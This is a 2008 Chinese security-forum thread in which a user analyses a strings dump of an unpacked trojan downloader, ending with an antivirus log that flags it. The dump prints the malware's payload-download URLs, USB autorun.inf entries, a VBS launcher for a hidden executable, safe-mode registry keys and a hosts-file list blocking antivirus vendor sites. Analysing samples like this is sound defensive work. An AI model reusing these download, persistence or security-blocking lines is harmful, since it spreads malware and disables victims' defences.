下一个到来的会是Windows Media Player 0day吗？

显示全部楼层 · 发表于 2008-5-17 23:34:26

BD MISS

目前尚未找到SBIE+配合他的一款软件。。

因此。。看代码。。

=。=

000011E3 004011E3    0 /huaix http://www.9u9u9.cn/
000015A8 004015A8    0 <script language="javascript" src="http://www.9u9u9.cn/pcgames/wowchina.js"></script>
000016AC 004016AC    0 recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe
000017B0 004017B0    0 http://www.30356769.cn/killbase/arp.exe
000018B4 004018B4    0 http://9u9u9.cn/wm/wincap.exe
000019B8 004019B8    0 <script language="javascript" src="http://www.9u9u9.cn/pcgames/wowchina.js"></script>
00001AB8 00401AB8    0 http://9u9u9.cn/tj/ct.asp
00001BBC 00401BBC    0 http://9u9u9.cn/wm/meupdate.ini
00001CC0 00401CC0    0 http://www.30356769.cn/killbase/me.exe
00001EC8 00401EC8    0 SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
00001F44 00401F44    0 SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
00001F78 00401F78    0 SYSTEM\CurrentControlSet\Control\SafeBoot\Network

00001FE0 00401FE0    0 c:\killme.bat
00002004 00402004    0 AST.exe
0000200C 0040200C    0 360tray.exe
砍掉ast.exe和360tray.exe的进程，利用killme.bat

00002018 00402018 0 ast.exe
00002020 00402020 0 windows
没猜错应该是创建一个名为ast.exe到windows目录下~

00002290 00402290    0 autorun.inf
0000229D 0040229D    0 shell\explore\Command=
000022B5 004022B5    0 shell\explore=
000022D5 004022D5    0 shell\open\Default=1
000022ED 004022ED    0 shell\open\Command=
00002305 00402305    0 shell\open=
0000231C 0040231C    0 [autorun]
00002326 00402326    0 OPEN=
0000232C 0040232C    0 \GHOSTBAK.exe
看到这里。。U盘病毒。。简单明了

然后发现一堆下载列表。。

00002694 00402694    0 http://www.9u9u9.cn/wm/10.exe
000026C0 004026C0    0 http://www.9u9u9.cn/wm/9.exe
000026EC 004026EC    0 http://www.9u9u9.cn/wm/7.exe
00002718 00402718    0 http://www.9u9u9.cn/wm/8.exe
00002744 00402744    0 http://www.9u9u9.cn/wm/6.exe
00002770 00402770    0 http://www.9u9u9.cn/wm/5.exe
0000279C 0040279C    0 http://www.9u9u9.cn/wm/4.exe
000027C8 004027C8    0 http://www.9u9u9.cn/wm/2.exe
000027F4 004027F4    0 http://www.9u9u9.cn/wm/1.exe
00002820 00402820    0 http://www.9u9u9.cn/wm/3.exe

继续深入研究，发现居然。。。。。

000028EC 004028EC    0 127.0.0.0 360.qihoo.com
00002905 00402905    0 127.0.0.1 qihoo.com
0000291A 0040291A    0 127.0.0.1 www.qihoo.com
00002933 00402933    0 127.0.0.1 www.qihoo.cn
0000294B 0040294B    0 127.0.0.1 124.40.51.17
00002963 00402963    0 127.0.0.1 58.17.236.92
0000297C 0040297C    0 127.0.0.1 www.kaspersky.com
00002999 00402999    0 127.0.0.1 60.210.176.251
000029B3 004029B3    0 127.0.0.1 www.cnnod32.cn
000029CD 004029CD    0 127.0.0.1 www.lanniao.org
000029E8 004029E8    0 127.0.0.1 www.nod32club.com
00002A05 00402A05    0 127.0.0.1 www.dswlab.com
00002A1F 00402A1F    0 127.0.0.1 bbs.sucop.com
00002A38 00402A38    0 127.0.0.1 www.virustotal.com
00002A56 00402A56    0 127.0.0.1 tool.ikaka.com
00002A74 00402A74    0 127.0.0.1 www.jiangmin.com
00002A90 00402A90    0 127.0.0.1 www.duba.net
00002AA8 00402AA8    0 127.0.0.1 www.eset.com.cn
00002AC3 00402AC3    0 127.0.0.1 www.nod32.com
00002ADC 00402ADC    0 127.0.0.1 shadu.duba.net
00002AF6 00402AF6    0 127.0.0.1 union.kingsoft.com
00002B14 00402B14    0 127.0.0.1 www.kaspersky.com.cn
00002B34 00402B34    0 127.0.0.1 kaspersky.com.cn
00002B50 00402B50    0 127.0.0.1 virustotal.com
00002B6C 00402B6C    0 # ****
00002B96 00402B96    0 127.0.0.1 www.360.cn
00002BAC 00402BAC    0 127.0.0.1 www.360safe.cn
00002BC6 00402BC6    0 127.0.0.1 www.360safe.com
00002BE1 00402BE1    0 127.0.0.1 www.chinakv.com
00002BFC 00402BFC    0 127.0.0.1 www.rising.com.cn
00002C19 00402C19    0 127.0.0.1 rising.com.cn
00002C32 00402C32    0 127.0.0.1 dl.jiangmin.com
00002C4D 00402C4D    0 127.0.0.1 jiangmin.com

劫持各大安全软件厂商的地址-。-

00002D32 00402D32    0 Set rs=createObject("Wscript.shell")
00002D58 00402D58    0 rs.run "%%windir%%\Tasks\ghost.exe",0
00002D80 00402D80    0 \Tasks\hackshen.vbs
00002D94 00402D94    0 stubpath
00002DAC 00402DAC    0 SOFTWARE\Microsoft\Windows Script Host\Settings
00002DDC 00402DDC    0 %windir%\Tasks\hackshen.vbs
VBS

00002DF8 00402DF8    0 IceSword
00002E10 00402E10    0 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
00002E50 00402E50    0 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
00002EFF 00402EFF    0 VVVh91@
00002F1A 00402F1A    0 VVVh/4@
00002F38 00402F38    0 VVVhya@
00002F47 00402F47    0 VVVhH<@
00002F56 00402F56    0 VVVh=@@
00002F74 00402F74    0 VVVhJF@
00002FA1 00402FA1    0 VVVhdQ@
00002FC3 00402FC3    0 VVVhL[@
00002FF7 00402FF7    0 SVWjA
00003300 00403300    0 VWh
00003CA6 00403CA6    0 [email=SVWj@3]SVWj@3[/email]
00003E93 00403E93    0 Ph0"@
00003F54 00403F54    0 [email=SVWj@3]SVWj@3[/email]
0000404D 0040404D    0 SVWj?3
000040F4 004040F4    0 QSUVW
00004167 00404167    0 PPPPPPPS
000045FF 004045FF    0 PQRPQR
00004B37 00404B37    0 SVWhD&@
0000516C 0040516C    0 SUVWj
000054A0 004054A0    0 WVVVVhx{@
0000555E 0040555E    0 YYh(#
0000559D 0040559D    0 PPPhKV@
0000565B 0040565B    0 SVWj?3
000058FD 004058FD    0 Ph0"@
00005932 00405932    0 PhL&@
00005EB5 00405EB5    0 VPVVj
000060BB 004060BB    0 SVWh$
00007DEE 00407DEE    0 Sleep
询问下高手。。这个是向冰刃的进程发送大量垃圾信息吗？？望指教！

00002CDC 00402CDC 0 \Device\PhysicalMemory
直接访问物理内存

把脱了壳的程序丢上来。。

[ 本帖最后由 garyyan456 于 2008-5-17 23:46 编辑 ]

显示全部楼层 · 发表于 2008-5-18 02:14:35

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\me_unpacked.rar'
C:\Documents and Settings\morgan\My Documents\
  me_unpacked.rar
[0] Archive type: RAR
--> me_unpacked.exe
      [DETECTION] Is the Trojan horse TR/Downloader.Gen
   [NOTE]    The file was deleted!

[病毒样本] 下一个到来的会是Windows Media Player 0day吗？

本帖子中包含更多资源

回复 11楼 garyyan456 的帖子